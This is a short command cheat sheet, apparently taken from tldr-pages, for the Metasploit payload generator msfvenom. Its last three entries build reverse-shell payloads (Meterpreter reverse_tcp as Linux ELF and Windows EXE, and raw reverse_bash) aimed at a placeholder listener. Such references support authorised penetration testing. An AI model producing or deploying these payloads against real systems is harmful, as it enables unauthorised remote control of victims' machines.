; This has been extracted from
; https://github.com/tldr-pages/tldr/blob/master/pages/common/msfvenom.md

% msfvenom, common

# List payloads
msfvenom <[-l|--list]> payloads

# List formats
msfvenom <[-l|--list]> formats

# Show payload options
msfvenom <[-p|--payload]> <payload> --list-options

# Create an ELF binary with a reverse TCP handler
msfvenom <[-p|--payload]> linux/x64/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> <[-f|--format]> elf <[-o|--out]> <path_to_binary>

# Create an EXE binary with a reverse TCP handler
msfvenom <[-p|--payload]> windows/x64/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> <[-f|--format]> exe <[-o|--out]> <path_to_binary.exe>

# Create a raw Bash with a reverse TCP handler
msfvenom <[-p|--payload]> cmd/unix/reverse_bash LHOST=<local_ip> LPORT=<local_port> <[-f|--format]> raw
